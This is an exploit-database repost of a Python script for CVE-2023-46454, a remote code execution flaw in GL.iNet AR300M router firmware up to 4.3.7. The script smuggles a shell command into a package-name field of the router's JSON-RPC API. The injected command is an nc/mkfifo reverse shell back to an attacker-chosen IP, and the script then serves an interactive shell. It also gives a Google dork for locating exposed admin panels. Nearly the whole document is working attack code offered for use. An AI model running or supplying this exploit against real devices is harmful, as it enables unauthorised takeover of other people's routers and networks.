GL.iNet AR300M v4.3.7 Remote Code Execution – CVE-2023-46454 Exploit

Exploit Database
158 阅读

作者： cyberaz0r

日期： 2024-03-03
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/51852/

100

101

102

103

104

105

106

#!/usr/bin/env python3

# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client

# Google Dork: intitle:"GL.iNet Admin Panel"

# Date: XX/11/2023

# Exploit Author: Michele 'cyberaz0r' Di Bonaventura

# Vendor Homepage: https://www.gli-net.com

# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar

# Version: 4.3.7

# Tested on: GL.iNet AR300M

# CVE: CVE-2023-46454

import socket

import requests

import readline

from time import sleep

from random import randint

from sys import stdout, argv

from threading import Thread

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def trigger_revshell(url, auth_token, payload):

sleep(0.25)

data = {

'jsonrpc': '2.0',

'id': randint(1000, 9999),

'method': 'call',

'params': [

auth_token,

'plugins',

'get_package_info',

{'name': 'bas{}e-files'.format(payload)}

]

}

requests.post(url, json=data, verify=False)

def get_command_response(s):

res = ''

while True:

try:

resp = s.recv(1).decode('utf-8')

res += resp

except UnicodeDecodeError:

pass

except socket.timeout:

break

return res

def revshell_listen(revshell_ip, revshell_port):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.settimeout(5)

try:

s.bind((revshell_ip, int(revshell_port)))

s.listen(1)

except Exception as e:

print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))

exit(1)

try:

clsock, claddr = s.accept()

clsock.settimeout(2)

if clsock:

print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))

res = ''

while True:

command = input('$ ')

clsock.sendall('{}\n'.format(command).encode('utf-8'))

stdout.write(get_command_response(clsock))

except socket.timeout:

print('[-] No connection received in 5 seconds, probably server is not vulnerable...')

s.close()

except KeyboardInterrupt:

print('\n[*] Closing connection')

try:

clsock.close()

except socket.error:

pass

except NameError:

pass

s.close()

def main(base_url, auth_token, revshell_ip, revshell_port):

print('[+] Started GL.iNet <= 4.3.7 RCE exploit')

payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)

print('[+] Reverse shell payload: "{}"'.format(payload))

print('[*] Triggering reverse shell connection')

Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()

print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))

revshell_listen(revshell_ip, revshell_port)

print('[+] Done')

if __name__ == '__main__':

if len(argv) < 5:

print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))

exit(1)

main(argv[1], argv[2], argv[3], argv[4])